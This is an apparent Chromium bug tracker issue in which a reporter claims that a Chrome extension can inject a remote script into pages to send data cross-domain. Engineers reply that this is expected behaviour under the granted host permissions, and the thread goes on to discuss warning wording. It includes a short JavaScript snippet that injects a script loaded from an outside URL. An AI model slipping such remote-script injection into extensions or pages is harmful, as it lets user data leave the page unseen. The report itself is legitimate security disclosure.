Issue metadata
Sign in to add a comment
|
Security: Cross domain security from js injection on chrome extension
Reported by
os.jerom...@gmail.com,
May 13 2018
|
||||||||||||||||||||
Issue description
Hello it is the first time i report an issue, sorry in advance if i did not do it as it is expected, i tried to follow the guidelines.
VULNERABILITY DETAILS
From a chrome extension, we can inject some javascript on the current user page able to send confidential data to external and cross domain servers.
The problem comes from the ability to create on the dom a script element with an src attribute pointing to any url.
I mean something like this :
var script = document.createElement('script');
script.src = "http://localhost:1337/";
document.head.appendChild(script);
all the details are in attachment.
VERSION
Version 66.0.3359.139 (Official Build) (64-bit)
Operating System: [Windows 10 PRO x64]
REPRODUCTION CASE
everything is in attachment
,
May 13 2018
Hello elawrence, Are you sure about what you say and did you see the attachment with the 3 requests mechanism in the example? For my point of view it seems very strange that a "color picker" extension, for example, could take many confidential information when you connect to some websites, without any warning even on https with cross domain request.
,
May 13 2018
In the extension folder, open manifest.json. What permissions are requested?
,
May 13 2018
"permissions": ["tabs","http://*/*","https://*/*","activeTab", "declarativeContent", "storage", "contextMenus"] Well if everything is allowed, it is ok for me. I just give you my feedback : It seems very very unsecure to use addons :) thank you for your answers
,
May 14 2018
When installing such an extension, the user is warned that the extension requests permission to "Read and change all your data on the websites you visit". If they grant permission, the extension may indeed do as the prompt warns.
,
May 15 2018
Hello elawrence, Yes of course i saw it, but i just asked the questions to different people today, and for them it was absolutely not obvious this sentence "Read and change all your data on the websites you visit" also means "the extension creator can also steal these data" If you can forward this information, maybe the warning message will be changed then it could save a lot of people :) Once again, thank you for the time you have spent concerning this report.
,
May 15 2018
What warning text do you imagine would be more clear?
,
May 15 2018
Hello elawrence, I am not a native english so i dont know if my advice Will be the best, but i would like to suggest something like : Read and change all your data on the websites you visit and make external use What do you think ? It seems more appropriate for me. Best regards
,
Aug 20
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||
Comment 1 by elawrence@chromium.org
, May 13 2018